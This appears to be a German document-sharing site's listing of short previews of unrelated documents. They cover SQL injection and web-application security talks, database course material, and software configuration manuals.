DIE DATENBANK ALS ERFÜLLUNGSGEHILFE FÜR DATENDIEBE Whitepaper DIE DATENBANK ALS ERFÜLLUNGSGEHILFE FÜR DATENDIEBE Eine Kurzeinführung in Injection Angriffe Ralf Reinhardt, SecureNet GmbH, Nov 2009 S CHLÜSSELWORTE Injection, SQL-Injection, SQLI, Blind SQL-Injection,

Mehr

Horstbox VoIP. Stefan Dahler. 1. HorstBox Konfiguration. 1.1 Einleitung

Horstbox VoIP. Stefan Dahler. 1. HorstBox Konfiguration. 1.1 Einleitung 1. HorstBox Konfiguration 1.1 Einleitung Im Folgenden wird die Voice over IP Konfiguration in der HorstBox beschrieben. Sie werden einen Internet Zugang über DSL zu Ihrem Provider konfigurieren und für

Mehr

Datenbanksysteme SS 2007

Datenbanksysteme SS 2007 Datenbanksysteme SS 2007 Frank Köster (Oliver Vornberger) Institut für Informatik Universität Osnabrück Kapitel 9c: Datenbankapplikationen Architektur einer Web-Applikation mit Servlets, JSPs und JavaBeans

Mehr

ESB - Elektronischer Service Bericht

ESB - Elektronischer Service Bericht Desk Software & Consulting GmbH ESB - Elektronischer Service Bericht Dokumentation des elektronischen Serviceberichts Matthias Hoffmann 25.04.2012 DESK Software und Consulting GmbH Im Heerfeld 2-4 35713

Mehr

Zur Bestätigung wird je nach Anmeldung (Benutzer oder Administrator) eine Meldung angezeigt:

Zur Bestätigung wird je nach Anmeldung (Benutzer oder Administrator) eine Meldung angezeigt: K U R Z A N L E I T U N G D A S R Z L WE B - P O R T A L D E R R Z L N E W S L E T T E R ( I N F O - M A I L ) RZL Software GmbH Riedauer Straße 15 4910 Ried im Innkreis Version: 11. Juni 2012 / mw Bitte

Mehr

SEMINAR Modifikation für die Nutzung des Community Builders

SEMINAR Modifikation für die Nutzung des Community Builders 20.04.2010 SEMINAR Modifikation für die Nutzung des Community Builders Step by Step Anleitung ecktion SEMINAR Modifikation für die Nutzung des Community Builders Step by Step Anleitung Bevor Sie loslegen

Mehr

Aktuelle Bedrohungen im Internet

Aktuelle Bedrohungen im Internet Aktuelle Bedrohungen im Internet Max Klaus, MELANI Bedrohungen von Webanwendungen Reto Inversini, BIT Botnetze webreaders.de/wp-content/uploads/2008/01/botnetz.jpg ISB / NDB Melde- und Analysestelle Informationssicherung

Mehr

Dokumentation für das Web-basierte Abkürzungsverzeichnis (Oracle mod_plsql / Apache)

Dokumentation für das Web-basierte Abkürzungsverzeichnis (Oracle mod_plsql / Apache) Dokumentation für das Web-basierte Abkürzungsverzeichnis (Oracle mod_plsql / Apache) vom 8. August 2005 Seite 1 / 7 1.System-Voraussetzungen Um dieses System zu verwenden, muß Oracles HTTP-Server mit dem

Mehr

E-Mail Adressen der BA Leipzig

E-Mail Adressen der BA Leipzig E-Mail Adressen der BA Jeder Student der BA bekommt mit Beginn des Studiums eine E-Mail Adresse zugeteilt. Diese wird zur internen Kommunikation im Kurs, von der Akademie und deren Dozenten zur Verteilung

Mehr

LDAP Konfiguration nach einem Update auf Version 6.3 Version 1.2 Stand: 23. Januar 2012 Copyright MATESO GmbH

LDAP Konfiguration nach einem Update auf Version 6.3 Version 1.2 Stand: 23. Januar 2012 Copyright MATESO GmbH LDAP Konfiguration nach einem Update auf Version 6.3 Version 1.2 Stand: 23. Januar 2012 Copyright MATESO GmbH MATESO GmbH Daimlerstraße 7 86368 Gersthofen www.mateso.de Dieses Dokument beschreibt die Konfiguration

Mehr

Mengenvergleiche: Alle Konten außer das, mit dem größten Saldo.

Mengenvergleiche: Alle Konten außer das, mit dem größten Saldo. Mengenvergleiche: Mehr Möglichkeiten als der in-operator bietet der θany und der θall-operator, also der Vergleich mit irgendeinem oder jedem Tupel der Unteranfrage. Alle Konten außer das, mit dem größten

Mehr

Online Banking System

Online Banking System Online Banking System Pflichtenheft im Rahmen des WI-Praktikum bei Thomas M. Lange Fachhochschule Giessen-Friedberg Fachbereich MNI Studiengang Informatik Erstellt von: Eugen Riske Yueksel Korkmaz Alper

Mehr

Angreifbarkeit von Webapplikationen

Angreifbarkeit von Webapplikationen Vortrag über die Risiken und möglichen Sicherheitslücken bei der Entwicklung datenbankgestützter, dynamischer Webseiten Gliederung: Einführung technische Grundlagen Strafbarkeit im Sinne des StGB populäre

Mehr

Anleitung OpenCms 8 Webformular Auswertung

Anleitung OpenCms 8 Webformular Auswertung Anleitung OpenCms 8 Webformular Auswertung 1 Erzbistum Köln Webformular Auswertung 15. August 2014 Inhalt 1. Allgemeines zum Webformular Auswertung... 3 2. Verwendung des Webformulars... 4 2.1. Reiter

Mehr

Webalizer HOWTO. Stand: 18.06.2012

Webalizer HOWTO. Stand: 18.06.2012 Webalizer HOWTO Stand: 18.06.2012 Copyright 2003 by manitu. Alle Rechte vorbehalten. Alle verwendeten Bezeichnungen dienen lediglich der Kennzeichnung und können z.t. eingetragene Warenzeichen sein, ohne

Mehr

WEBAPPLIKATIONEN MIT PHP. Wo gibt es Hilfe? Wie fang ich an?

WEBAPPLIKATIONEN MIT PHP. Wo gibt es Hilfe? Wie fang ich an? WEBAPPLIKATIONEN MIT PHP Wo gibt es Hilfe? Wie fang ich an? Tools Webapplikationen bestehen aus Textdateien Lassen sich in Texteditoren schreiben Alternativen: Eclipse (PDT) Netbeans (Dynamic Languages)

Mehr

PROSTEP AG: Anmelden für eine mehrtägige Schulung für Opel-Zulieferer

PROSTEP AG: Anmelden für eine mehrtägige Schulung für Opel-Zulieferer PROSTEP AG: Anmelden für eine mehrtägige Schulung für Opel-Zulieferer Für eine reibungslose Zusammenarbeit fordert Opel von jedem seiner Zulieferunternehmen, dass es für das General Motors-Zulieferer-Portal

Mehr

Adminer: Installationsanleitung

Adminer: Installationsanleitung Adminer: Installationsanleitung phpmyadmin ist bei uns mit dem Kundenmenüpasswort geschützt. Wer einer dritten Person Zugriff auf die Datenbankverwaltung, aber nicht auf das Kundenmenü geben möchte, kann

Mehr

ecall Anleitung Outlook Mobile Service (OMS)

ecall Anleitung Outlook Mobile Service (OMS) ecall Anleitung Outlook Mobile Service (OMS) V1.3 18. Februar 2011 Copyright 2011,, Wollerau Informieren und Alarmieren Samstagernstrasse 45 CH-8832 Wollerau Phone +41 44 787 30 70 Fax +41 44 787 30 71

Mehr

Frankfurt, 15.05.2012

Frankfurt, 15.05.2012 DOAG SIG Middleware Frankfurt, 15.05.2012 Jan Peter Timmermann PITSS GmbH 1 Copyright 2011 PITSS GmbH www.pitss.com Agenda Motivation für diesen Vortrag Sicherheitsrisiken im Netz Was war bisher möglich

Mehr

Betroffene Produkte: Alle Versionen von Oracle Forms (3.0-10g, C/S und Web), Oracle Clinical, Oracle Developer Suite

Betroffene Produkte: Alle Versionen von Oracle Forms (3.0-10g, C/S und Web), Oracle Clinical, Oracle Developer Suite Zusammenfassung: Alle Oracle Forms Anwendungen sind per Default durch SQL Injection angreifbar. Oracle Applications >=11.5.9 ist davon nicht betroffen, da hier standardmäßig der Wert FORMSxx_RESTRICT_ENTER_QUERY

Mehr

Synchronisations- Assistent

Synchronisations- Assistent TimePunch Synchronisations- Assistent Benutzerhandbuch Gerhard Stephan Softwareentwicklung -und Vertrieb 25.08.2011 Dokumenten Information: Dokumenten-Name Benutzerhandbuch, Synchronisations-Assistent

Mehr

TimeMachine. Time CGI. Version 1.5. Stand 04.12.2013. Dokument: time.odt. Berger EDV Service Tulbeckstr. 33 80339 München

TimeMachine. Time CGI. Version 1.5. Stand 04.12.2013. Dokument: time.odt. Berger EDV Service Tulbeckstr. 33 80339 München Time CGI Version 1.5 Stand 04.12.2013 TimeMachine Dokument: time.odt Berger EDV Service Tulbeckstr. 33 80339 München Fon +49 89 13945642 Mail rb@bergertime.de Versionsangaben Autor Version Datum Kommentar

Mehr

PHP-Schwachstellen und deren Ausnutzung

PHP-Schwachstellen und deren Ausnutzung PHP-Schwachstellen und deren Ausnutzung 44. DFN Betriebstagung / 7. Februar 2006 DFN-CERT Services GmbH Jan Kohlrausch / CSIRT Gliederung Grundlagen HTTP und PHP Anatomie typischer Schwachstellen in PHP-Skripten

Mehr

Sicherheit in Datenbank- und Informationssystemen

Sicherheit in Datenbank- und Informationssystemen Sicherheit in Datenbank- und Informationssystemen Ingo Frommholz Universität Duisburg-Essen ingo.frommholz@uni-due.de Datenbank-Praktikum 12. Juli 2006 UNIVERSITÄT D U I S B U R G E S S E N Inhalt 1 Sicherheit

Mehr

Anleitung zur Einrichtung einer ODBC Verbindung zu den Übungsdatenbanken

Anleitung zur Einrichtung einer ODBC Verbindung zu den Übungsdatenbanken Betriebliche Datenverarbeitung Wirtschaftswissenschaften AnleitungzurEinrichtungeinerODBC VerbindungzudenÜbungsdatenbanken 0.Voraussetzung Diese Anleitung beschreibt das Vorgehen für alle gängigen Windows

Mehr

BAPS Basel Psychologie Studien

BAPS Basel Psychologie Studien Was ist BAPS? BAPS ist eine Onlinedatenbank zum Verwalten von Studien. Ab diesem Semester werden Studien online auf BAPS ausgeschrieben. Dir als StudentIn gibt die BAPS Datenbank eine Übersicht über alle

Mehr

macs Support Ticket System

macs Support Ticket System macs Support Ticket System macs Software GmbH Raiffeisenstrasse 8 78658 Zimmern ob Rottweil Tel. (0741)9422880 1 ALLGEMEIN... 3 2 ABLAUF TICKET-SYSTEM... 4 2.1 Ticket Erstellung... 4 2.2 Ablauf... 4 2.3

Mehr

Firmware-Update, CAPI Update

Firmware-Update, CAPI Update Produkt: Modul: Kurzbeschreibung: Teldat Bintec Router RT-Serie Firmware-Update, CAPI Update Diese Anleitung hilft Ihnen, das nachfolgend geschilderte Problem zu beheben. Dazu sollten Sie über gute bis

Mehr

Diese Anleitung enthält Anweisungen, die nur durch erfahrene Anwender durchgeführt werden sollten!

Diese Anleitung enthält Anweisungen, die nur durch erfahrene Anwender durchgeführt werden sollten! Anmeldung über SSH Diese Anleitung enthält Anweisungen, die nur durch erfahrene Anwender durchgeführt werden sollten! Besitzer der Homepage Advanced und Homepage Professional haben die Möglichkeit, direkt

Mehr

3. Stored Procedures und PL/SQL

3. Stored Procedures und PL/SQL 3. Stored Procedures und PL/SQL Wenn eine Anwendung auf einer Client-Maschine läuft, wird normalerweise jede SQL-Anweisung einzeln vom Client an den Server gesandt, und jedes Ergebnistupel wird einzeln

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Dr. Marc Rennhard Institut für angewandte Informationstechnologie Zürcher Hochschule Winterthur marc.rennhard@zhwin.ch Angriffspunkt

Mehr

Zugriff auf das Across-Ticketsystem

Zugriff auf das Across-Ticketsystem Zugriff auf das Across-Ticketsystem Februar 2014 Version 2.2 Copyright Across Systems GmbH Die Inhalte dieses Dokumentes dürfen nur nach schriftlicher Zustimmung der Across Systems GmbH reproduziert oder

Mehr

Lokales Netzwerk Probleme beim Verbinden eines Linux-Clients mit einem Windows 2003 Server Frage:

Lokales Netzwerk Probleme beim Verbinden eines Linux-Clients mit einem Windows 2003 Server Frage: Probleme beim Verbinden eines Linux-Clients mit einem Windows 2003 Server Frage: Ich möchte von einem Linux-Client aus, bzw. aus der Image-Software "Acronis TrueImage", auf Daten zugreifen, welche auf

Mehr

Infinigate (Schweiz) AG. Secure Guest Access. - Handout -

Infinigate (Schweiz) AG. Secure Guest Access. - Handout - Infinigate (Schweiz) AG Secure Guest Access - Handout - by Christoph Barreith, Senior Security Engineer 29.05.2012 1 Inhaltsverzeichnis 1 Inhaltsverzeichnis... 1 2 Secure Guest Access... 2 2.1 Gäste Accounts

Mehr

SQL für Trolle. mag.e. Dienstag, 10.2.2009. Qt-Seminar

SQL für Trolle. mag.e. Dienstag, 10.2.2009. Qt-Seminar Qt-Seminar Dienstag, 10.2.2009 SQL ist......die Abkürzung für Structured Query Language (früher sequel für Structured English Query Language )...ein ISO und ANSI Standard (aktuell SQL:2008)...eine Befehls-

Mehr

Web-Sicherheit: Kein fauler Zauber?! Kai Jendrian. <Seminartitel> <Seminartitel>

Web-Sicherheit: Kein fauler Zauber?! Kai Jendrian. <Seminartitel> <Seminartitel> Web-Sicherheit: Kein fauler Zauber?! Security Consulting GmbH, Karlsruhe Seite 1 Security Consulting GmbH, Karlsruhe Seite 2 Security Consulting GmbH, Karlsruhe Seite 3 Security

Mehr

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter Datensicherheit Vorlesung 5: 15.5.2015 Sommersemester 2015 h_da, Lehrbeauftragter Inhalt 1. Einführung & Grundlagen der Datensicherheit 2. Identitäten / Authentifizierung / Passwörter 3. Kryptografie 4.

Mehr

Email Konfigurieren mit Mozilla Thunderbird

Email Konfigurieren mit Mozilla Thunderbird Email Konfigurieren mit Mozilla Thunderbird Mozilla Thunderbird ist für Windows, Mac und Linux / *BSD erhältlich. Diese Anleitung wurde auf Windows erstellt, die Einrichtung und Bedienung auf anderen Systemen

Mehr

Umstieg auf Microsoft Exchange in der Fakultät 02

Umstieg auf Microsoft Exchange in der Fakultät 02 Umstieg auf Microsoft Exchange in der Fakultät 02 Der IT-Steuerkreis der Hochschule München hat am am 26.07.12 einstimmig beschlossen an der Hochschule München ein neues Groupware-System auf der Basis

Mehr

Betriebshandbuch. MyInTouch Import Tool

Betriebshandbuch. MyInTouch Import Tool Betriebshandbuch MyInTouch Import Tool Version 2.0.5, 17.08.2004 2 MyInTouch Installationshandbuch Inhaltsverzeichnis Inhaltsverzeichnis... 2 Bevor Sie beginnen... 3 Einleitung...3 Benötigte Daten...3

Mehr

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein:

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein: 5. HTTP Proxy (Auth User / URL Liste / Datei Filter) 5.1 Einleitung Sie konfigurieren den HTTP Proxy, um die Webzugriffe ins Internet zu kontrollieren. Das Aufrufen von Webseiten ist nur authentifizierten

Mehr

mit Musterlösungen Prof. Dr. Gerd Stumme, Dipl.-Inform. Christoph Schmitz 11. Juni 2007

mit Musterlösungen Prof. Dr. Gerd Stumme, Dipl.-Inform. Christoph Schmitz 11. Juni 2007 6. Übung zur Vorlesung Datenbanken im Sommersemester 2007 mit Musterlösungen Prof. Dr. Gerd Stumme, Dipl.-Inform. Christoph Schmitz 11. Juni 2007 Aufgabe 1: Rekursion Betrachten Sie die folgende Tabelle

Mehr

How-to: Webserver NAT. Securepoint Security System Version 2007nx

How-to: Webserver NAT. Securepoint Security System Version 2007nx Securepoint Security System Inhaltsverzeichnis Webserver NAT... 3 1 Konfiguration einer Webserver NAT... 4 1.1 Einrichten von Netzwerkobjekten... 4 1.2 Erstellen von Firewall-Regeln... 6 Seite 2 Webserver

Mehr

Schwachstellenanalyse 2012

Schwachstellenanalyse 2012 Schwachstellenanalyse 2012 Sicherheitslücken und Schwachstellen in Onlineshops Andre C. Faßbender Schwachstellenforschung Faßbender 13.01.2012 Inhaltsverzeichnis 1. Abstract... 3 2. Konfiguration der getesteten

Mehr

E-Mail als SMS. O 2 (ehem. VIAG, Genion) SMS E-Mail aktivieren: Verschicken Sie mindestens eine

E-Mail als SMS. O 2 (ehem. VIAG, Genion) SMS E-Mail aktivieren: Verschicken Sie mindestens eine Diese Information beschreibt wie Sie die E-Mail-Alarmfunktion von Thermoguard nutzen können, um eine Alarm-Mail als SMS-Kurznachricht auf ein Handy zu senden. Es folgen allgemeine Angaben zu den Netzbetreibern

Mehr

Inhalt: Ihre persönliche Sedcard... 1 Login... 1 Passwort vergessen... 2 Profildaten bearbeiten... 3

Inhalt: Ihre persönliche Sedcard... 1 Login... 1 Passwort vergessen... 2 Profildaten bearbeiten... 3 Inhalt: Ihre persönliche Sedcard..... 1 Login... 1 Passwort vergessen... 2 Profildaten bearbeiten... 3 Passwort ändern... 3 email ändern... 4 Sedcard-Daten bearbeiten... 4 Logout... 7 Ich kann die Sedcard

Mehr

FTP-Server einrichten mit automatischem Datenupload für SolarView@Fritzbox

FTP-Server einrichten mit automatischem Datenupload für SolarView@Fritzbox FTP-Server einrichten mit automatischem Datenupload für SolarView@Fritzbox Bitte beachten: Der im folgenden beschriebene Provider "www.cwcity.de" dient lediglich als Beispiel. Cwcity.de blendet recht häufig

Mehr

Partnerportal Installateure Registrierung

Partnerportal Installateure Registrierung Partnerportal Installateure Registrierung Ein Tochterunternehmen der Süwag Energie AG Allgemeine Hinweise Diese Anleitung zeigt Ihnen, wie Sie sich als Nutzer für das Partnerportal Installateure registrieren

Mehr

Dipl. Inf. Dipl. Math. Y. Orkunoglu Datum: 11.09.2009

Dipl. Inf. Dipl. Math. Y. Orkunoglu Datum: 11.09.2009 Hochschule Darmstadt DATENBANKEN Fachbereich Informatik Praktikum 3 Dipl. Inf. Dipl. Math. Y. Orkunoglu Datum: 11.09.2009 PL/SQL Programmierung Anwendung des Cursor Konzepts und Stored Procedures Und Trigger

Mehr

Einrichten des IIS für VDF WebApp. Einrichten des IIS (Internet Information Server) zur Verwendung von Visual DataFlex Web Applications

Einrichten des IIS für VDF WebApp. Einrichten des IIS (Internet Information Server) zur Verwendung von Visual DataFlex Web Applications Einrichten des IIS (Internet Information Server) zur Verwendung von Visual DataFlex Web Applications Windows 8 Systemsteuerung > Programme > Windows Features aktivieren / deaktivieren > Im Verzeichnisbaum

Mehr

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn Aktuelle Angriffstechniken Steffen Tröscher cirosec GmbH, Heilbronn Gliederung Angriffe auf Webanwendungen Theorie und Live Demonstrationen Schwachstellen Command Injection über File Inclusion Logische

Mehr

Anwendungsbeispiele Sign Live! Secure Mail Gateway

Anwendungsbeispiele Sign Live! Secure Mail Gateway Anwendungsbeispiele Sign Live! Secure Mail Gateway Kritik, Kommentare & Korrekturen Wir sind ständig bemüht, unsere Dokumentation zu optimieren und Ihren Bedürfnissen anzupassen. Ihre Anregungen sind uns

Mehr

-Bundle auf Ihrem virtuellen Server installieren.

-Bundle auf Ihrem virtuellen Server installieren. Anleitung: Confixx auf virtuellem Server installieren Diese Anleitung beschreibt Ihnen, wie Sie das Debian-Confixx- -Bundle auf Ihrem virtuellen Server installieren. 1. Schritt: Rufen Sie die Adresse http://vsadmin.host-4-you.de

Mehr

Kurzanleitung fu r Clubbeauftragte zur Pflege der Mitgliederdaten im Mitgliederbereich

Kurzanleitung fu r Clubbeauftragte zur Pflege der Mitgliederdaten im Mitgliederbereich Kurzanleitung fu r Clubbeauftragte zur Pflege der Mitgliederdaten im Mitgliederbereich Mitgliederbereich (Version 1.0) Bitte loggen Sie sich in den Mitgliederbereich mit den Ihnen bekannten Zugangsdaten

Mehr

Interaktive Medien Richtlinien für das Codieren Version vom 18. Juni 2014

Interaktive Medien Richtlinien für das Codieren Version vom 18. Juni 2014 Interaktive Medien Richtlinien für das Codieren Version vom 18. Juni 2014 Martin Vollenweider Dateinamen im Internet Da wir im Internet in gemischten Hard- und Softwareumgebungen (z.b. Windows, Unix, Macintosh,

Mehr

Website freiburg-bahai.de

Website freiburg-bahai.de Website freiburg-bahai.de Eine kleine Gebrauchsanleitung Liebe Freunde! Das ist eine kleine Gebrauchsanleitung zu den Funktionen der Website freiburg-bahai.de. Eine Gebrauchsanleitung für die Administratoren

Mehr

robotron*e count robotron*e sales robotron*e collect Anmeldung Webkomponente Anwenderdokumentation Version: 2.0 Stand: 28.05.2014

robotron*e count robotron*e sales robotron*e collect Anmeldung Webkomponente Anwenderdokumentation Version: 2.0 Stand: 28.05.2014 robotron*e count robotron*e sales robotron*e collect Anwenderdokumentation Version: 2.0 Stand: 28.05.2014 Seite 2 von 5 Alle Rechte dieser Dokumentation unterliegen dem deutschen Urheberrecht. Die Vervielfältigung,

Mehr

Das digitale Scheunentor

Das digitale Scheunentor Folie 1 "Das digitale Scheunentor" Folie 2 "Das digitale Scheunentor" Das digitale Scheunentor Prüferfahrungen des Landesbeauftragten für den Datenschutz Rheinland-Pfalz aus der Kontrolle von Internetangeboten

Mehr